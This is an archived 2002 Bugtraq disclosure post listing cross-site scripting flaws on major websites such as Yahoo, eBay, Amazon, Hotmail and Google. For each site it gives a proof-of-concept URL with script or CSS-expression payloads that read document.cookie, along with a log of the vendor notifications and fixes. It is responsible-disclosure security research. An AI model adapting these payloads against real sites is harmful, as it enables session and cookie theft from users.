('binary' encoding is not supported, stored as-is) On april 26 I posted a message about Cross-Site scripting (see bottom) I mentioned that I had found Cross-site scripting flaws in many major websites but I did not publish the exact details of these flaws. After notifying the owners of these sites and giving them time to respond and fix the problem, I now feel I have to post the details to bugtraq. This information and more on cross-site scripting can also be found on my website http://spoor12.edup.tudelft.nl/skylined which is updated almost daily. Kind regards, Berend-Jan Wever. Cross-site scripting archive: Here are all the sites that I know to have at least one cross-site scripting flaw. I have logged all the communication I have had with them. (Last update April 19, 2002) www.search.com http://www.search.com/search? q='><SCRIPT>alert(document.cookie) </SCRIPT>' - 23 mar 2002 Reported @ "http://www.cnet.com/cnetsupport/contact/1,10 161,0-3945,00.html" - 28 mar 2002 Reported @ "http://www.search.com/feedback/" ------------------------------------------------------------------ -------------- www.altavista.com http://www.altavista.com/sites/search/web? q=*&kl="><SCRIPT>alert(document.cookie) </SCRIPT> - 23 mar 2002 Reported @ "http://help.altavista.com/contact/search" - 25 mar 2002 Reply by email: "We have forwarded your email to our engineering team for further investigation" ------------------------------------------------------------------ -------------- edit.yahoo.com http://edit.yahoo.com/config?.done="% 20style="width:expression(document.write (document.cookie)); - 27 mar 2002 Reported to "arturo@yahoo- inc.com", "mfk@yahoo-inc.com" ------------------------------------------------------------------ -------------- search.netscape.com addressbook.netscape.com http://search.netscape.com/search.psp? search="><SCRIPT>alert(document.cookie) </SCRIPT> http://addressbook.netscape.com/search.adp? SearchStr="><SCRIPT>alert(document.cookie) </SCRIPT> (Addressbook.netscape.com requires you to be logged in) - 23 mar 2002 Reported @ "http://help.netscape.com/website/feedback.ht ml" ------------------------------------------------------------------ -------------- cq-search.ebay.com http://cq- search.ebay.com/search/search.dll? MfcISAPICommand=GetResult&ht="><SCRIPT>a lert(document.cookie)</SCRIPT>&query=a - 26 mar 2002 Reported to "clalondeat_private" - 27 mar 2002 Reply by email: "Reviewing the issue", "Do you have any suggestions?" - 27 mar 2002 Gave some hints and told them about my CSS howto. ------------------------------------------------------------------ -------------- www.amazon.com http://www.amazon.com/exec/obidos/ASIN/B0000 5T68P/ref%3D%20style%3Dwidth% 3Aexpression%28document.write% 28document.cookie%29%29%20/ - 23 mar 2002 Reported @ "http://www.amazon.com/exec/obidos/handle- generic-form/102-3185800-6674542?action=next- page&target=stores/help/self-service-email-form- dispatch.html&display=basic&browse=560710&m ethod=GET&cgi-post-result=1/102-3185800- 6674542." - 26 mar 2002 "Cyrusat_private" responded to my bugtraq post - 26 mar 2002 Reported to "Cyrusat_private" - 26 mar 2002 Told them about my CSS howto. ------------------------------------------------------------------ -------------- www.looksmart.com cnn.looksmart.com http://www.looksmart.com/r_search? look=&key=><SCRIPT>alert(document.cookie) </SCRIPT> http://cnn.looksmart.com/r_search? look=&key=><SCRIPT>alert(document.cookie) </SCRIPT> - 23 mar 2002 Reported to "feedbackat_private" ------------------------------------------------------------------ -------------- www.time.com http://www.time.com/time/searchresults? query=a&summaries="% 20style="width:expression(document.write (document.cookie))" - 23 mar 2002 Reported to "dailyat_private" - 26 mar 2002 Reported to "Renee_Guttmannat_private" ------------------------------------------------------------------ -------------- www.infospace.com http://www.infospace.com/info.xcite/dog/newsresul ts.htm?&qkw="><SCRIPT>alert(document.cookie) </SCRIPT>&qcat=news&fs=nws - 23 mar 2002 Reported @ "http://www.infospace.com/info/redirs_all.htm? pgtarg=abtct&" ------------------------------------------------------------------ -------------- www.lasseters.com.au http://www.lasseters.com.au/default3.asp? Network="%20onload="alert(document.cookie);"% 20z=" - 28 mar 2002 Reported @ "http://www.lasseters.com.au/help/onetoone.ht ml" to Karl F (chatid 114640) - 28 mar 2002 Reported to "supportat_private" - 28 mar 2002 (Automated) reply by email: "our priority is to respond to your query as soon as possible", tracking number T20020328004M - 28 mar 2002 Reply by email: "We are investigating this issue very seriously", "I have passed this information onto the relevant department" ------------------------------------------------------------------ -------------- my.abcnews.go.com http://my.abcnews.go.com/localpageMainHandler ?input=<SCRIPT>alert(document.cookie) </SCRIPT> - 28 mar 2002 Reported @ "http://abcnews.go.com/service/Help/abccontac tform.html" Fixed cross-site scripting flaws archive Here are all the cross-site scripting flaws I uncovered which have been fixed now. This is just to show how it was done and who have been found wanting. www.redhat.com http://www.redhat.com/apps/search/results.html? ie="><SCRIPT>alert(document.cookie) </SCRIPT> - 26 mar 2002 "mjcat_private" responded to my bugtraq post. - 26 mar 2002 Reported to "mjcat_private" - 26 mar 2002 Reply from "tlancastat_private": "Fixed now" ------------------------------------------------------------------ -------------- www.hotmail.com See my MSN Hotmail Cross- site scripting page for more information - 19 mar 2002 Reported @ "Report a bug on the Hotmail website" (url contained sensitive information ;)~ - 22 mar 2002 Reported to "supportat_private" - bounced - 23 mar 2002 Reply from "abuseat_private": "Look at the help if you have any problems using hotmail" - 27 mar 2002 Explained it was a serious issue to "abuseat_private" - 27 mar 2002 Reply from "abuseat_private": "Your e- mail has been forwarded to the appropriate team" - 28 mar 2002 Reply from "support_xat_private": "We have tried to reproduce the error, but have been unable to do so" - 29 mar 2002 Send a working example to "cs_servat_private" - 30 mar 2002 Reply from "cs_servat_private": "We have confirmed the issue that you describe and are currently working on a fix" - 30 mar 2002 Reply from "cs_servat_private": "we have isolated the bug and expect to have a fix for it out by Wednesday." (3 apr 2002) The fix: as far as I could find out they now replace the properties 'dataFld', 'dataFormatAs' and 'dataSrc' of any HTML tag with 'xdataFld', 'xdataFormatAs' and 'xdataSrc' to prevent XML generation of HTML alltogether. MSN Hotmail has been very polite to thank me for bringing this to their attention multiple times. ------------------------------------------------------------------ -------------- search.microsoft.com http://search.microsoft.com/default.asp?qu=";% 0D%0Aalert(document.cookie);%0D% 0Aa="&boolean=ALL This one was fixed within hours after discovery and without me notifying microsoft, now that's service! ------------------------------------------------------------------ -------------- www.google.com http://www.google.nl/search? as_q=a&ie="><SCRIPT>alert(document.cookie) </SCRIPT> - 23 mar 2002 Reported to "webmasterat_private" - 23 mar 2002 (Automated) reply by email: "you'll hear from us soon" The fix: all '<' and '>' characters are replaced with '_'. I have not received a word from Google except for the automated responds. (Guess whether I'm gonna report the next CSS to them...) ------------------------------------------------------------------ -------------- www.nic.cc http://www.nic.cc/cgi-bin/cart? domain=<SCRIPT>alert(document.cookie) </SCRIPT> - 23 mar 2002 Reported to "clientcareat_private" The fix: filter out '<' and '>'. I have not received a word from Nic.cc. (Guess whether I'm gonna report the next CSS to them...) ------------------------------------------------------------------ -------------- support.microsoft.com http://support.microsoft.com/default.aspx?scid=');} alert(document.cookie);{// - 28 mar 2002 Reported to "supportat_private" - 28 mar 2002 (Automated) reply by email: "Your e-mail <snip> will be handled personally by one of our Customer Service Representatives within 24 hours" The fix: The ' in the expoit url used to end a string but this string is now enclosed by " instead of ', the " character is filtered out. I have not received a word from microsoft support except for the automated responds. (Guess whether I'm gonna report the next CSS to them...) ------------------------------------------------------------------ -------------- download.cnet.com http://download.cnet.com/downloads/1,10150,0- 10001-103-0-1-7,00.html?qt=<SCRIPT>alert (document.cookie)</SCRIPT> - 28 mar 2002 Reported @ "http://download.cnet.com/downloads/0-10000- 7-1532857.html?tag=subnav" The fix: The characters <, > and " are replaced with <, > and ". ------------------------------------------------------------------ -------------- www.nu http://www.nu/tour/tour_images.cfm? ID=EN&site=<SCRIPT>alert(document.cookie) </SCRIPT> (The error report would suggest a SQL-injection vulnerability but I have not done further testing.) - 23 mar 2002 Reported both CSS & SQL- injection to "dwdat_private" - 19 apr 2002 The bug seems to have been fixed.
This archive was generated by hypermail 2b30 : Sat Apr 20 2002 - 13:20:29 PDT